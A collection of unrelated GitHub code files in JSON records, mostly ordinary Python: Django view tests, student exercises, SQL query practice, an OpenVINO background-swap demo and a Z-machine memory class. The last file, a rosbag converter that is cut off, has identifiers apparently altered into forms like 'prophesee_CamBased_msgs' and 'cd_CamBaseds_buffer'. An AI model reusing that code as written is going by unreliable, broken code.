title='test_group',\n            slug='test-slug',\n            description='test_description'\n        )\n        cls.post = Post.objects.create(\n            text='test_post',\n            group=cls.group,\n            author=cls.author\n        )\n\n    def test_cache_index(self):\n        \"\"\"Проверка хранения и очищения кэша для index.\"\"\"\n        response = CacheViewsTest.authorized_client.get(reverse('posts:index'))\n        posts = response.content\n        Post.objects.create(\n            text='test_new_post',\n            author=CacheViewsTest.author,\n        )\n        response_old = CacheViewsTest.authorized_client.get(\n            reverse('posts:index')\n        )\n        old_posts = response_old.content\n        self.assertEqual(\n            old_posts,\n            posts,\n            'Не возвращает кэшированную страницу.'\n        )\n        cache.clear()\n        response_new = CacheViewsTest.authorized_client.get(reverse('posts:index'))\n        new_posts = response_new.content\n        self.assertNotEqual(old_posts, new_posts, 'Нет сброса кэша.')\n\n\nclass FollowViewsTest(TestCase):\n    @classmethod\n    def setUpClass(cls):\n        super().setUpClass()\n        cls.guest_client = Client()\n        cls.author = User.objects.create_user(\n            username='test_author'\n        )\n        cls.auth_author_client = Client()\n        cls.auth_author_client.force_login(cls.author)\n\n        cls.user_fol = User.objects.create_user(\n            username='test_user_fol'\n        )\n        cls.authorized_user_fol_client = Client()\n        cls.authorized_user_fol_client.force_login(\n            cls.user_fol\n        )\n\n        cls.user_unfol = User.objects.create_user(\n            
username='test_user_unfol'\n )\n cls.authorized_user_unfol_client = Client()\n cls.authorized_user_unfol_client.force_login(\n cls.user_unfol\n )\n cls.group = Group.objects.create(\n title='test_group',\n slug='test-slug',\n description='test_description'\n )\n cls.post = Post.objects.create(\n text='test_post',\n group=cls.group,\n author=cls.author\n )\n\n def test_follow(self):\n \"\"\"Тест работы подписки на автора.\"\"\"\n client = FollowViewsTest.authorized_user_unfol_client\n user = FollowViewsTest.user_unfol\n author = FollowViewsTest.author\n client.get(\n reverse(\n 'posts:profile_follow',\n args=[author.username]\n )\n )\n follower = Follow.objects.filter(\n user=user,\n author=author\n ).exists()\n self.assertTrue(\n follower,\n 'Не работает подписка на автора'\n )\n\n def test_unfollow(self):\n \"\"\"Тест работы отписки от автора.\"\"\"\n client = FollowViewsTest.authorized_user_unfol_client\n user = FollowViewsTest.user_unfol\n author = FollowViewsTest.author\n client.get(\n reverse(\n 'posts:profile_unfollow',\n args=[author.username]\n ),\n\n )\n follower = Follow.objects.filter(\n user=user,\n author=author\n ).exists()\n self.assertFalse(\n follower,\n 'Не работает отписка от автора'\n )\n\n def test_new_author_post_for_follower(self):\n client = FollowViewsTest.authorized_user_fol_client\n author = FollowViewsTest.author\n group = FollowViewsTest.group\n client.get(\n reverse(\n 'posts:profile_follow',\n args=[author.username]\n )\n )\n response_old = client.get(\n reverse('posts:follow_index')\n )\n old_posts = response_old.context.get(\n 'page'\n ).object_list\n self.assertEqual(\n len(response_old.context.get('page').object_list),\n 1,\n 'Не загружается правильное колличество старых постов'\n )\n self.assertIn(\n FollowViewsTest.post,\n old_posts,\n 'Старый пост не верен'\n )\n new_post = Post.objects.create(\n text='test_new_post',\n group=group,\n author=author\n )\n cache.clear()\n response_new = client.get(\n reverse('posts:follow_index')\n )\n new_posts = response_new.context.get(\n 'page'\n ).object_list\n self.assertEqual(\n len(response_new.context.get('page').object_list),\n 2,\n 'Нету нового поста'\n )\n self.assertIn(\n new_post,\n new_posts,\n 'Новый пост не верен'\n )\n\n def test_new_author_post_for_unfollower(self):\n client = FollowViewsTest.authorized_user_unfol_client\n author = FollowViewsTest.author\n group = FollowViewsTest.group\n response_old = client.get(\n reverse('posts:follow_index')\n )\n old_posts = response_old.context.get(\n 'page'\n ).object_list\n self.assertEqual(\n len(response_old.context.get('page').object_list),\n 0,\n 'Не загружается правильное колличество старых постов'\n )\n self.assertNotIn(\n FollowViewsTest.post,\n old_posts,\n 'Старый пост не должен загружаться'\n )\n new_post = Post.objects.create(\n text='test_new_post',\n group=group,\n author=author\n )\n cache.clear()\n response_new = client.get(\n reverse('posts:follow_index')\n )\n new_posts = response_new.context.get(\n 'page'\n ).object_list\n self.assertEqual(\n len(response_new.context.get('page').object_list),\n 0,\n 'Новый пост не должен появляться'\n )\n self.assertNotIn(\n new_post,\n new_posts,\n 'Новый пост не должен появляться'\n )\n","repo_name":"smirnov71/hw04-05-06_errors_and_pictures","sub_path":"yatube/posts/tests/test_views.py","file_name":"test_views.py","file_ext":"py","file_size_in_byte":16629,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"25823930940","text":"from random import 
*\r\n\r\nprint('Здравствуйте! Добро пожаловать в программу, которая заполняет ',end = \"\")\r\nprint('список данными о средней температуре каждого дня июля ',end = \"\")\r\nprint('случайными числами в диапазоне от +15 до +42.')\r\nprint('В последствии она выводит информацию о средней температуре ',end = \"\")\r\nprint('каждого дня в Июле, а также выводит даты двух самых теплых дней',end = \" \")\r\nprint('вместе с их температурами.')\r\n\r\nJULY_DAYS = 31\r\n\r\nMIN_TEMPERATURE = 15\r\nMAX_TEMPERATURE = 42\r\n\r\nINDEX_STEP = 1\r\n\r\njuly_temparatures = []\r\n\r\nfor day_index in range(JULY_DAYS):\r\n\tjuly_temparatures.append(randint(MIN_TEMPERATURE,MAX_TEMPERATURE))\r\n\tprint('Средняя температура за {}-е число составляет {} градусов'.format(day_index + INDEX_STEP,july_temparatures[day_index]))\r\n\r\n#1\r\nwarmest_day_a = 0\r\nwarmest_day_b = 0\r\n\r\nwarmest_day_a_index = 0\r\nwarmest_day_b_index = 0\r\n\r\nfor day_index in range(JULY_DAYS):\r\n\tif(july_temparatures[day_index] > warmest_day_a):\r\n\t\twarmest_day_a = july_temparatures[day_index]\r\n\t\twarmest_day_a_index = day_index\r\n\r\nfor day_index in range(JULY_DAYS):\r\n\tif(july_temparatures[day_index] > warmest_day_b and july_temparatures[day_index] < warmest_day_a):\r\n\t\twarmest_day_b = july_temparatures[day_index]\r\n\t\twarmest_day_b_index = day_index\r\n\r\nprint('\nГотово! Выдаю результаты: ')\r\nprint()\r\n\r\nprint(\"Самыми жаркими днями являются {} июля с температурой {}\".format(warmest_day_a_index + INDEX_STEP,warmest_day_a), end = \" \")\r\nprint(\"и {} июля с температурой {}\".format(warmest_day_b_index + INDEX_STEP, warmest_day_b))\r\n\r\n#2\r\ndecades_temperature_july = []\r\nsum_temperatures_decade = 0\r\nDECADE_TERMINAL = 10\r\n\r\nfor day_index in range(JULY_DAYS):\r\n\tsum_temperatures_decade += july_temparatures[day_index]\r\n\tif((day_index + INDEX_STEP) % DECADE_TERMINAL == 0 ):\r\n\t\tdecades_temperature_july.append(sum_temperatures_decade)\r\n\t\tsum_temperatures_decade = 0 # Что по поводу Последнего 31-го дня? Куда отнести и что с ним сделать?\r\n\r\ncoldest_decade = decades_temperature_july[0]\r\ncoldest_decade_index = 0\r\n\r\nfor decade_index in range(len(decades_temperature_july)):\r\n\tif(decades_temperature_july[decade_index] < coldest_decade):\r\n\t\tcoldest_decade = decades_temperature_july[decade_index]\r\n\t\tcoldest_decade_index = decade_index\r\nprint('\nГотово! 
Самая холодная декада найдена.')\r\nprint()\r\nprint(\"Самой холодной декадой является {} с общей температурой {}\".format(coldest_decade_index + INDEX_STEP,coldest_decade))\r\nprint()\r\n#3\r\nupdated_july_temparatures = []\r\nupdated_july_temparatures.append(randint(MIN_TEMPERATURE,MAX_TEMPERATURE))\r\nDAYS_MAX_DIFFERENCE_TEMPERATURE = 5\r\n\r\nfor day_index in range(1,JULY_DAYS):\r\n\tprevious_day_temperature = updated_july_temparatures[day_index - INDEX_STEP]\r\n\tnew_random_temperature = randint(previous_day_temperature - DAYS_MAX_DIFFERENCE_TEMPERATURE ,previous_day_temperature + DAYS_MAX_DIFFERENCE_TEMPERATURE)\r\n\r\n\twhile(new_random_temperature < MIN_TEMPERATURE or new_random_temperature > MAX_TEMPERATURE):\r\n\t\tnew_random_temperature = randint(previous_day_temperature - DAYS_MAX_DIFFERENCE_TEMPERATURE ,previous_day_temperature + DAYS_MAX_DIFFERENCE_TEMPERATURE)\r\n\t\t\r\n\tupdated_july_temparatures.append(new_random_temperature)\r\n\r\nprint('Среднесуточные температуры Июля, где температуры рядом стоящих дней',end = \" \")\r\nprint('не отличаются больше чем на 5 градусов: ',end = \"\")\r\n\r\nfor day_temperature in updated_july_temparatures:\r\n\tprint(day_temperature, end = \", \")\r\n\r\n\r\n","repo_name":"MaratulyTemirbolat/ItStep","sub_path":"Python/HomeWorks/HW14/HW_MaratulyTemirbolat.py","file_name":"HW_MaratulyTemirbolat.py","file_ext":"py","file_size_in_byte":4010,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70250132267","text":"# todo:Прочитать главу 6 (стр. 119) книги SQL Полное Руководство.\n#Написать на модели данных ПО \"Авторизация\" запросы:\n\n\nimport psycopg2\n\nconn = psycopg2.connect(\n    host=\"localhost\",\n    database=\"task\",\n    user=\"postgres\",\n    password=\"4511\")\n\nprint(conn)\n\ncur = conn.cursor()\n\n#1. Простой запрос\n#список студентов, и их задачи\n\nSQL = f\"\"\"SELECT s.surname , t.\"name\" , t.condition\n    FROM students s , students_task st , task t\n    WHERE s.id = st.id_students\n    AND st.id_task = t.id\"\"\"\n\ncur.execute(SQL)\nrecords = cur.fetchall()\nfor row in records:\n    print(row)\n\n\n#2. Вычисляемый столбец\n#студенты, решившие задачу 1\n\n\nSQL_TASK = f\"\"\"SELECT s.surname , t.name \n    from students s , students_task st , task t\n    where s.id = st.id_students\n    and t.id = st.id_task\n\t and t.id = 1\"\"\"\ncur.execute(SQL_TASK)\nrecords = cur.fetchall()\nfor row in records:\n    print(row)\n\n\n#3. Выборка всех столбцов\n\nSQL_ALL = f\"\"\"SELECT s.surname , t.name , t.condition\n    from students s , students_task st , task t\n    where s.id = st.id_students\n    and t.id = st.id_task\"\"\"\n\ncur.execute(SQL_ALL)\n\nrecords = cur.fetchall()\nfor row in records:\n    print(row)\n\n\n#4. Повторяющиеся строки (DISTINCT)\n\nSQL_DISTINCT = f\"\"\"SELECT DISTINCT s.surname\n    from students s\"\"\"\n\ncur.execute(SQL_DISTINCT)\n\nrecords = cur.fetchall()\nfor row in records:\n    print(row)\n\n\n#5. Отбор строк (WHERE) с оператором сравнения\n\nSQL_WHERE = f\"\"\"SELECT id_students , id_task\n    from students_task\n    where id_task <> 1\"\"\"\n\ncur.execute(SQL_WHERE)\n\nrecords = cur.fetchall()\nfor row in records:\n    print(row)\n\n\n# 6. Выборка одной строки\n\n\nSQL_LINE = f\"\"\"SELECT name\n    from task\n    where id = 1\"\"\"\n\ncur.execute(SQL_LINE)\n\nrecords = cur.fetchall()\nfor row in records:\n    print(row)\n\n\n# 7. Проверка на принадлежность диапазону (BETWEEN)\n\nSQL_BETWEEN = f\"\"\"SELECT ID , name , condition\n    from task\n    where id BETWEEN 2 AND 4\"\"\"\n\n\ncur.execute(SQL_BETWEEN)\n\nrecords = cur.fetchall()\nfor row in records:\n    print(row)\n\n\n# 8. Проверка наличия во множестве (IN)\n\nSQL_IN = f\"\"\"SELECT ID , name , condition\n    from task\n    where ID IN (2 , 4)\"\"\"\n\ncur.execute(SQL_IN)\n\nrecords = cur.fetchall()\nfor row in records:\n    print(row)\n\n\n# 9. Проверка на соответствие шаблону (LIKE)\nSQL_LIKE = f\"\"\"SELECT id, surname\n    FROM students\n    WHERE surname LIKE 'stud%'\"\"\"\n\ncur.execute(SQL_LIKE)\n\nrecords = cur.fetchall()\nfor row in records:\n    print(row)\n\n\n#10. Проверка на равенство NULL (is NULL)\nSQL_NULL = f\"\"\"SELECT id\n    from task\n    where ID IS NOT NULL\"\"\"\ncur.execute(SQL_NULL)\n\nrecords = cur.fetchall()\nfor row in records:\n    print(row)\n\n\n#11. Сопоставление условия отбора (AND, OR и NOT)\n\nSQL_OR = f\"\"\"SELECT surname\n    from students\n    where id < 9\n    or id < 3\"\"\"\ncur.execute(SQL_OR)\n\nrecords = cur.fetchall()\nfor row in records:\n    print(row)\n\n\n#12. Сортировка результатов запроса (ORDER BY)\n\nSQL_ORDER_BY = f\"\"\"SELECT id_students , id_task\n\t FROM students_task\n\t order by id_task\"\"\"\n\ncur.execute(SQL_ORDER_BY)\n\nrecords = cur.fetchall()\nfor row in records:\n    print(row)\n\n\n#13. Объединение результатов нескольких запросов (UNION)\n\nSQL_UNION = f\"\"\"SELECT surname\n    from students\n    where id > 3\n    union\n    select name\n    from task\n    where id >5\"\"\"\ncur.execute(SQL_UNION)\n\nrecords = cur.fetchall()\nfor row in records:\n    print(row)\n\n\ncur.close()\nconn.close()\n\n","repo_name":"EkaterinaKazennikova/python_autumn_work_2022","sub_path":"unit_two/task.py","file_name":"task.py","file_ext":"py","file_size_in_byte":4417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"776512427","text":"import argparse\n\nimport fastavro  # noqa: F401\n\nimport lsst.alert.packet\n\n\ndef parse_args():\n    parser = argparse.ArgumentParser()\n    # Default value based on LSE-81\n    parser.add_argument('--visits-per-year', type=int, default=1056//10,\n                        help='Number of visits per year')\n    parser.add_argument('--num-alerts', type=int, default=10,\n                        help='Number of simulated alert packets to generate')\n    parser.add_argument('output_filename', type=str,\n                        help=\"File to which to write alerts\")\n    return parser.parse_args()\n\n\ndef main():\n    args = parse_args()\n\n    schema = lsst.alert.packet.Schema.from_file()\n    arrayCount = {'prvDiaSources': args.visits_per_year,\n                  'prvDiaForcedSources': args.visits_per_year//12,\n                  'prvDiaNondetectionLimits': 0}\n    alerts = [lsst.alert.packet.simulate_alert(schema.definition,\n                                               keepNull=['ssObject'],\n                                               arrayCount=arrayCount)\n              for _ in range(args.num_alerts)]\n\n    for alert in alerts:\n        assert schema.validate(alert)\n\n    with open(args.output_filename, \"wb\") as f:\n        schema.store_alerts(f, alerts)\n\n    with open(args.output_filename, \"rb\") as f:\n        writer_schema, loaded_alerts = schema.retrieve_alerts(f)\n\n    assert schema == writer_schema\n    for a1, a2 in zip(alerts, loaded_alerts):\n        assert a1 == a2\n\n\nif __name__ == '__main__':\n    
main()\n","repo_name":"lsst/alert_packet","sub_path":"python/lsst/alert/packet/bin/simulateAlerts.py","file_name":"simulateAlerts.py","file_ext":"py","file_size_in_byte":1512,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"37"} +{"seq_id":"15391543288","text":"'''\nAuthor: matiastang\nDate: 2022-08-03 16:20:10\nLastEditors: matiastang\nLastEditTime: 2022-08-03 16:41:49\nFilePath: /matias-AI/md/非线性回归/test.py\nDescription: 一元多项式\n'''\n#!/usr/bin/python3\n#coding=utf-8\nimport numpy as np\nimport matplotlib.pyplot as plt\n\nif __name__ == '__main__':\n # 定义0-1之间的等距的10个点\n x = np.linspace(0, 1, 10)\n w = 1.1\n b = 0.2\n y = w * x + b\n line1 = plt.plot(x, y, marker='.')\n\n x2 = x * x\n w2 = -0.5\n y2 = w * x + w2 * x2 + b\n line2 = plt.plot(x, y2, marker='s')\n\n x3 = x * x * x\n w3 = 2.3\n y3 = w * x + w2 * x2 + w3 * x3 + b\n line3 = plt.plot(x, y3, marker='x')\n\n plt.grid()\n plt.xlabel(\"x\")\n plt.ylabel(\"y\")\n plt.title(\"linear and non-linear\")\n plt.legend([line1,line2,line3], [\"x\",\"x*x\",\"x*x*x\"])\n plt.show()","repo_name":"matiastang/matias-AI","sub_path":"md/非线性回归/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":832,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"22817810153","text":"from pyverless import ServerlessFramework, Provider, Function, Constants, RegionalParam, StageRegionParam\n\nsls = ServerlessFramework(\n framework_version=\"2.70.0\",\n service=\"ras\",\n provider=Provider(\n name='aws',\n runtime='python3.8',\n lambda_hashing_version='20201221',\n )\n)\n\nregional_timeout = RegionalParam(\n sls_framework=sls,\n name=\"api_timeout\",\n mapping={\n \"us-east-1\": 10,\n \"us-east-2\": 20\n },\n default=30\n)\n\nstage_region_name = StageRegionParam(\n sls_framework=sls,\n name=\"memory_size\",\n mapping={\n (\"dev\", \"us-east-1\"): 128,\n (\"prod\", \"us-east-1\"): 1024,\n (\"prod\", \"eu-west-1\"): 512,\n },\n default=256\n)\n\nFunction(\n sls,\n \"api\",\n handler=\"api.handler\",\n timeout=regional_timeout.key,\n memory_size=stage_region_name.key,\n environment={\n \"AWS_REGION\": Constants.REGION,\n \"STAGE\": Constants.STAGE,\n }\n)\n","repo_name":"Om3rr/pyverless","sub_path":"examples/regional/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"37"} +{"seq_id":"25567062783","text":"import json\nimport logging\nimport os\nimport sys\nfrom os import path\n\n\nwith open('config.json') as file:\n config = json.load(file)\n\n\n# Plot options setup\nDEFAULT_OPTIONS = config['default_options']\n\ndef default_options():\n \"\"\"\n Return a 2nd level deep copy of DEFAULT_OPTIONS.\n \"\"\"\n return {k: v.copy() if 'copy' in dir(v) else v for k, v in DEFAULT_OPTIONS.items()}\n\n\n# Terminal setup\nterm_options = config['term_options']\n\navailable_terms = {\n 'eps': 'postscript eps color {}'.format(term_options['eps']),\n 'gp': 'gp',\n 'png': 'pngcairo {}'.format(term_options['png']),\n 'qt': 'qt {}'.format(term_options['qt']),\n 'wxt': 'wxt',\n 'x': 'x11'\n}\n\ntry:\n term = sys.argv[1].lstrip('-')\nexcept IndexError:\n term = 'eps'\n\nif term not in available_terms:\n print(__doc__.format(fig_x=sys.argv[0]).strip(), file=sys.stderr)\n exit(2)\n\nDEFAULT_OPTIONS['terminal'] = available_terms[term]\nif term in ('wxt', 'x'):\n DEFAULT_OPTIONS['wait'] = True\n\n\ndef output(curves, options, filename=None, *args):\n \"\"\"\n Generate 
output file from curves.\n\n :curves: list of curves for the gnuplotlib plot function\n :options: options dictionary for the gnuplotlib plot function\n :filename: output file name as a (format) string *without* the extension\n :args: substitutions to be made in 'filename'\n \"\"\"\n if logger.level >= logging.INFO: print(flush=True)\n if term in ('eps', 'gp', 'png'):\n filename = filename.format(*args)\n options['output'] = filename + '.' + term\n data_file = filename + '.data'\n\n if logger.level == logging.DEBUG:\n # Save plotted data to file.\n curves = [curve if len(curve) == 3 else curve + ({},) for curve in curves]\n header = \"\\t\".join(\"x\\t\" + str(opt.get('legend', 'unlabeled')) for x, y, opt in curves)\n matrix = [row.astype(np.float64) for x, y, opt in curves for row in (x, y)]\n maxlen = max(len(row) for row in matrix)\n matrix = [np.concatenate([row, np.full(maxlen - len(row), np.nan)]) for row in matrix]\n matrix = np.array(matrix).transpose()\n logger.info(\"Generating data file %s\", options['output'])\n np.savetxt(data_file, matrix, fmt=\"%.3e\", delimiter=\"\\t\", header=header)\n\n logger.info(\"Generating file %s\", options['output'])\n gp.gnuplotlib(**options).plot(*curves)\n\n\ndef name(filename):\n return path.splitext(path.basename(filename))[0]\n\n\n# Text\ntitle = config['title']\nlabel = config['label']\nPLOT_LETTER = label['PLOT_LETTER']\n\n# Gnuplot point types\nPOINT_SQUARE = 5\nPOINT_BALL = 7\nPOINT_TRIANGLE = 9\nPOINT_INVTRIANGLE = 11\nPOINT_DIAMOND = 13\n\n# Modules used by figures\nimport math\nimport multiprocessing\nimport numpy as np\nimport sympy as sym\nimport gnuplotlib as gp\nfrom multiprocessing import pool\n\nimport utils\n\nlogging.basicConfig(format='[%(levelname)s] %(message)s', level=logging.INFO)\nlogger = logging.getLogger()\n\nif logger.level == logging.DEBUG:\n DEFAULT_OPTIONS['with'] = 'linespoints '\n","repo_name":"amphybio/stochastic-gene-expression","sub_path":"entropy2020/src/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":3030,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"37808921904","text":"class Solution:\n def isPalindrome(self, x: int) -> bool:\n if x < 0:\n return False\n temp_num = x\n regx = 0\n flag = len(str(x)) % 2 # 判断这个数是否是奇数位数,奇数位数时处理略有不同\n round_num = len(str(x)) // 2\n while round_num > 0:\n regx = regx * 10 + (temp_num % 10) # 将x的后半部分逆序输出为regx\n temp_num //= 10 # 去掉最后一位\n round_num -= 1\n if flag:\n temp_num //= 10\n return temp_num == regx\n\n\nif __name__ == '__main__':\n sol = Solution()\n sol.isPalindrome(123467321)\n","repo_name":"hubing1791/my_leetcode","sub_path":"leetcode_main/easy/9_easy_palindrome_number/palin_num_reversehalf.py","file_name":"palin_num_reversehalf.py","file_ext":"py","file_size_in_byte":639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"17306890695","text":"from typing import TYPE_CHECKING\n\nif TYPE_CHECKING:\n from entharion.trace import Trace\n\nfrom entharion.instruction import Instruction\nfrom entharion.logging import log\nfrom entharion.stack import Stack\n\n\nclass Memory:\n def __init__(self, data: bytes, trace: \"Trace\") -> None:\n self.stack = Stack()\n\n self.data: bytes = data\n self.trace: \"Trace\" = trace\n\n self.version: int = self.read_byte(0x00)\n\n self.dynamic: int = 0\n self.static: int = self.read_word(0x0E)\n self.high: int = self.read_word(0x04)\n\n self.routine_offset: int = self.read_word(0x28)\n 
self.strings_offset: int = self.read_word(0x2A)\n\n self.global_table_start: int = self.read_word(0x0C)\n\n self.pc: int\n\n self._memory_checks()\n self._read_starting_address()\n\n self.details()\n\n def details(self) -> None:\n log(f\"Zcode version: {self.version}\")\n log(f\"Static memory start: {hex(self.static)}\")\n log(f\"High memory start: {hex(self.high)}\")\n log(f\"Routine offset: {self.routine_offset}\")\n log(f\"Strings offset: {self.strings_offset}\")\n log(f\"Global table start: {hex(self.global_table_start)}\")\n log(f\"Starting address: {hex(self.pc)}\")\n log(\"----------------------------------------------\\n\")\n\n def read_instruction(self, address: int) -> Instruction:\n instruction = Instruction(self, address)\n instruction.decode()\n\n return instruction\n\n def read_byte(self, address: int) -> int:\n return self.data[address]\n\n def read_word(self, address: int) -> int:\n return (self.data[address] << 8) | self.data[address + 1]\n\n def read_packed(self, address: int, is_routine: bool) -> int:\n if self.version < 4:\n return 2 * address\n\n if self.version < 6:\n return 4 * address\n\n if self.version < 8 and is_routine:\n return 4 * address + (8 * self.routine_offset)\n\n if self.version < 8:\n return 4 * address + (8 * self.strings_offset)\n\n return 8 * address\n\n def _read_starting_address(self) -> None:\n if self.version != 6:\n self.pc = self.read_word(0x06)\n else:\n self.pc = self.read_packed(self.read_word(0x06), True)\n\n def _memory_checks(self) -> None:\n header_size: int = 64\n\n # There is a minimum size to a zcode program in that it must be able\n # to accommodate a 64 byte header.\n\n if len(self.data) < header_size:\n raise RuntimeError(\"dynamic memory is below required 64 bytes\")\n\n # The specification indicates that dynamic memory must contain at\n # least 64 bytes to accommodate the header.\n\n if self.static < header_size:\n raise RuntimeError(\"static memory begins before byte 64\")\n\n # The specification indicates that the total of dynamic plus static\n # memory must not exceed 64K minus 2 bytes.\n\n dynamic_size: int = self.static - 1 - self.dynamic + 1\n\n if (dynamic_size + self.static) > 65534:\n raise RuntimeError(\"memory exceeds addressable memory space\")\n","repo_name":"jeffnyman/entharion","sub_path":"src/entharion/memory.py","file_name":"memory.py","file_ext":"py","file_size_in_byte":3151,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70686686187","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\n\"\"\"\n代码功能:\n给你一个正整数n, 编程求所有这样的五位和六位十进制回文数,\n满足各位数字之和等于n(5<=n<=54)。\n按从小到大的顺序输出满足条件的整数。\n\"\"\"\n\n\ndef pldr(min_digit, max_digit):\n\n \"\"\" 返回一个包含要求位数回文数的list \"\"\"\n\n pal_clcts = []\n for num in range(10**(min_digit - 1), 10**max_digit):\n xstr = str(num)\n if xstr == xstr[::-1]:\n pal_clcts.append(num)\n return pal_clcts\n\ndef pldr_output(number):\n\n \"\"\" 在屏幕上打印出各位数字之和为要求数值的所有5至6位回文数 \"\"\"\n\n pldr_use = pldr(5, 6)\n matched_num = 0\n for num in pldr_use:\n if sum(int(i) for i in str(num)) == number:\n print(num)\n matched_num += 1\n if matched_num == 0:\n print('无匹配项')\n\ndef func():\n\n \"\"\" 主函数 \"\"\"\n\n num_request = int(input('n = '))\n pldr_output(num_request)\n\n\nif __name__ == '__main__':\n func()\n","repo_name":"crispding/gitskills","sub_path":"palindrome.py","file_name":"palindrome.py","file_ext":"py","file_size_in_byte":1036,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} 
+{"seq_id":"6927396421","text":"for _ in range(int(input())):\n n=int(input())\n s=int(input())\n\n if len(str(int('1'*(n+1))-s)) > n:\n print(int('9'*n)-s)\n else:\n print(int('1'*(n+1))-s)\n\n# can also be written as\n# print (int('1'*(l+1) if n[0]=='9' else '9'*l)-int(n))","repo_name":"Raffian-moin/Codeforces-solutions","sub_path":"codeforces/1000/palindromic_number.py","file_name":"palindromic_number.py","file_ext":"py","file_size_in_byte":259,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"18914840729","text":"import cv2\r\nimport numpy as np\r\n\r\nfrom openvino.inference_engine import IENetwork, IECore\r\n\r\ndef main():\r\n\r\n ie = IECore()\r\n\r\n model='deeplabv3' # in='mul_1/placeholder_port_1'(1,3,513,513), out='ArgMax/Squeeze'(1,513,513)\r\n model = './public/'+model+'/FP16/'+model\r\n net = ie.read_network(model+'.xml', model+'.bin')\r\n exec_net = ie.load_network(net, 'CPU')\r\n\r\n #cap = cv2.VideoCapture('movie1.264')\r\n cap = cv2.VideoCapture(0)\r\n\r\n bg = cv2.imread('background.jpg')\r\n ret, img = cap.read()\r\n bg = cv2.resize(bg, (img.shape[1], img.shape[0]))\r\n\r\n key = -1\r\n while key!=27:\r\n ret, img = cap.read()\r\n if ret==False:\r\n return 0\r\n cv2.imshow('input', img)\r\n\r\n blob = cv2.resize(img, (513, 513))\r\n blob = blob.transpose((2,0,1))\r\n blob = blob.reshape((1,3,513,513))\r\n\r\n res = exec_net.infer(inputs={'mul_1/placeholder_port_1': blob}) ['ArgMax/Squeeze'][0]\r\n\r\n clsId = 15 # PascalVOC class 0=BG, 15=Person\r\n mask = np.where(res==clsId, 255, 0).astype(np.uint8)\r\n mask = cv2.resize(mask, (img.shape[1], img.shape[0]))\r\n mask_p = np.reshape(mask, (img.shape[0], img.shape[1], 1))\r\n mask_n = 255-mask_p\r\n\r\n img = img & mask_p\r\n bg_tmp = bg & mask_n\r\n img = img | bg_tmp \r\n\r\n cv2.imshow('Result', img)\r\n key = cv2.waitKey(1)\r\n\r\nif __name__ == '__main__':\r\n main()\r\n","repo_name":"yas-sim/openvino-semantic-segmentation-demos","sub_path":"background_swap.py","file_name":"background_swap.py","file_ext":"py","file_size_in_byte":1445,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"37"} +{"seq_id":"42796437461","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Aug 27 11:34:22 2021\r\n\r\n@author: naika\r\n\"\"\"\r\n\r\nimport random\r\n\r\ndef pick_name(num_options=1):\r\n nameFile = open(\"./namefile.txt\", \"r\", encoding=\"utf8\")\r\n names = nameFile.read().split()\r\n nameFile.close()\r\n \r\n options = []\r\n \r\n for _ in range(num_options):\r\n options.append(random.choice(names))\r\n \r\n return options\r\n \r\ndef pick_townname(num_options=1):\r\n affixes = ['', 'port', 'clare', 'ley', 'view', 'folk', 'sex', 'karta', 'grad',\r\n 'hampton', 'stead', 'stedt', 'stätt', 'dorf', 'wych', 'wick', \r\n 'wyke', 'wich', 'thorpe', 'thorp', 'ceter', 'ham', 'cester', 'stadt',\r\n 'caster', 'by', 'dale', 'field', 'ford', 'town', 'bury', 'chester', \r\n 'ton', 'burgh', 'burg', 'ville']\r\n \r\n bases = pick_name(num_options)\r\n towns = []\r\n for base in bases:\r\n towns.append(base + random.choice(affixes))\r\n \r\n return towns","repo_name":"MaxfieldEngland/friendtron","sub_path":"namegen.py","file_name":"namegen.py","file_ext":"py","file_size_in_byte":982,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"37"} +{"seq_id":"70934522349","text":"import numpy as np\nimport rosbag\nfrom std_msgs.msg import *\n# from dvs_msgs.msg import CamBased, CamBasedArray\nfrom 
prophesee_CamBased_msgs.msg import CamBased, CamBasedArray\nfrom tqdm import tqdm\n\n\ndef e2npy(config, fn=\"CamBaseds.npy\"):\n bag = rosbag.Bag(config[\"bag_path\"], \"r\")\n eva_msgs = []\n for m in tqdm(bag.read_messages(config[\"CamBased_topic\"])):\n eva_msgs.append(m.message)\n # eva_msgs = [m.message for m in bag.read_messages(config[\"CamBased_topic\"])]\n CamBased_array = []\n for ea in eva_msgs:\n for e in ea.CamBaseds:\n CamBased_array.append(e)\n\n CamBased_np = np.zeros([len(CamBased_array), 4])\n\n for i in range(len(CamBased_array)):\n CamBased_np[i, 0] = CamBased_array[i].ts.secs+CamBased_array[i].ts.nsecs/1e9\n CamBased_np[i, 1] = CamBased_array[i].x\n CamBased_np[i, 2] = CamBased_array[i].y\n CamBased_np[i, 3] = 1 if CamBased_array[i].polarity else 0\n CamBased_np = CamBased_np[CamBased_np[:, 0].argsort()]\n np.save(fn, CamBased_np)\n\n\nif __name__ == \"__main__\":\n config = {}\n config[\"bag_path\"] = \"/home/mpl/datasets/nfov_day_loopychessboard_filter.bag\"\n config[\"CamBased_topic\"] = \"/prophesee/camera/cd_CamBaseds_buffer\"\n 